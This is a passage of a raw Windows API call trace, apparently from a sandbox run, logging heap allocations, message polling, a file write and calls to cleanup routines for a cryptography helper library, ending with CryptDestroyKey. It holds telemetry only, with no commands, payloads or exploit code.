hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0260.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29bf8 | out: hHeap=0x970000) returned 1 [0260.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0260.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0260.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15be0) returned 0x2f14010 [0260.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed62c0 | out: hHeap=0x970000) returned 1 [0260.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0260.430] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0260.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0260.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0260.431] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0260.431] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0260.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0260.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0260.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0260.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0260.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0260.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15be0) returned 0x2f29bf8 [0260.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0260.433] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f29bf8*, nNumberOfBytesToWrite=0x15be0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f29bf8*, lpNumberOfBytesWritten=0x8cf5e4*=0x15be0, lpOverlapped=0x0) returned 1 [0260.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0260.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29bf8 | out: hHeap=0x970000) returned 1 [0260.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0260.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0260.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0260.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0260.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0260.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0260.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0260.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0260.438] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0260.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0260.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0260.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0260.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0260.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0260.439] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0260.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0260.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55078 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0260.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0260.439] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0260.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0260.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0260.440] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0260.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0260.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0260.440] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0260.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0260.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0260.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0260.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0260.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0260.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0260.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0260.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0260.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0260.441] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0260.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0260.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0260.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0260.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0260.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0260.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0260.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0260.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0260.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0260.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0260.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0260.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0260.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0260.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0260.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0260.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51b80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0260.443] CryptDestroyKey (hKey=0xa87590) returned 1 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0260.443] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0260.443] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0260.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0260.443] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0260.443] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0260.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0260.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0260.444] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0260.444] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0260.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0260.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.444] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0260.444] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0260.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0260.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0260.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0260.444] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0260.444] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0260.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0260.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0260.444] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0260.444] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0260.445] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0260.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0260.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0260.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0260.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0260.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0260.445] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0260.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0260.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0260.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0260.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0260.445] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0260.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0260.446] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0260.446] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0260.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0260.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0260.446] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0260.446] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0260.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0260.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0260.447] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0260.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0260.447] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0260.447] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0260.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0260.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0260.447] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0260.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0260.447] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: 